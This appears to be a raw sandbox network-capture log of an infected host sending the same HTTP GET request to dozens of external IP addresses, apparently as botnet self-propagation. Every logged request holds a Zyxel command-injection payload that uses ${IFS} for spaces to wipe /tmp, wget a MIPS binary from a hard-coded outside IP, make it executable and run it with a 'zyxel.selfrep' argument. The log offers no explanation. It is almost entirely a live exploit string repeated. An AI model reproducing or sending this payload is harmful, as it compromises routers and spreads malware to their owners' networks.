                                                  Jan 19, 2024 18:23:35.705405951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  559192.168.2.135756219.120.248.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:35.705450058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  560192.168.2.1345280119.233.249.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:35.705486059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  561192.168.2.135707047.1.138.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:35.705543995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  562192.168.2.1338814144.62.126.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:35.705612898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  563192.168.2.134328095.221.155.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709206104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  564192.168.2.1344828134.44.172.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709244967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  565192.168.2.1337288209.143.192.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709291935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  566192.168.2.134862067.75.143.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709359884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  567192.168.2.1360032207.23.2.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709427118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  568192.168.2.1355322223.54.153.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709428072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  569192.168.2.1346504102.120.234.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:36.709472895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  570192.168.2.1354638164.159.186.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713671923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  571192.168.2.1348444132.171.83.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713711023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  572192.168.2.1337140195.40.26.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713742018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  573192.168.2.1336964184.30.48.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713778019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  574192.168.2.1336088184.90.166.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713820934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  575192.168.2.1359334142.126.199.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713877916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  576192.168.2.134104689.32.98.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.713979006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  577192.168.2.1353232199.193.119.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.714032888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  578192.168.2.1349788115.114.62.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.714124918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  579192.168.2.1348262132.253.169.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:37.714143991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  580192.168.2.1344706158.222.104.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:38.717969894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  581192.168.2.1346720181.227.190.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:38.718019009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  582192.168.2.1335482125.207.166.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:38.718044996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  583192.168.2.1357820184.143.123.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:38.718087912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  584192.168.2.1344698162.157.33.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:38.718204975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  585192.168.2.1351616105.182.226.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:38.718276024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  586192.168.2.135944669.75.56.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730355024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  587192.168.2.1339700188.101.30.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730411053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  588192.168.2.133794269.190.211.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730444908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  589192.168.2.1341964205.155.112.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730484009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  590192.168.2.133336818.13.141.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730519056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  591192.168.2.1350252172.168.189.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730537891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  592192.168.2.1348182192.24.225.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730588913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  593192.168.2.13420301.102.171.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730638981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  594192.168.2.133837290.86.159.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730668068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  595192.168.2.134990690.171.51.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730705023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  596192.168.2.135661896.77.17.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730752945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  597192.168.2.135717413.144.58.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730799913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  598192.168.2.1348314196.112.54.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730827093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  599192.168.2.133907840.96.49.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730843067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  600192.168.2.1335698191.92.118.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.730995893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  601192.168.2.135275067.72.200.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731040955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  602192.168.2.1333968200.105.191.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731066942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  603192.168.2.13448125.63.167.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731090069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  604192.168.2.1356664126.51.53.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731152058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  605192.168.2.133407479.95.81.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731164932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  606192.168.2.135401254.198.242.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731218100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  607192.168.2.134176884.189.94.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731264114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  608192.168.2.1356870115.179.113.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731298923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  609192.168.2.133552871.33.124.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731334925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  610192.168.2.1341882118.206.77.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731383085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  611192.168.2.1347240109.249.107.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731430054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  612192.168.2.1339436143.41.216.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731472969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  613192.168.2.1343678180.87.219.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731568098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  614192.168.2.1355692182.204.185.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731575966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  615192.168.2.1351902139.11.48.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731609106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  616192.168.2.1340152124.246.177.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731663942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  617192.168.2.1359814132.220.245.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731708050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  618192.168.2.1351494198.83.241.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731739998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  619192.168.2.1348740146.224.133.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731758118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  620192.168.2.1360696206.174.113.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:40.731786013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  621192.168.2.135180246.84.103.252443
                                                  TimestampBytes transferredDirectionData
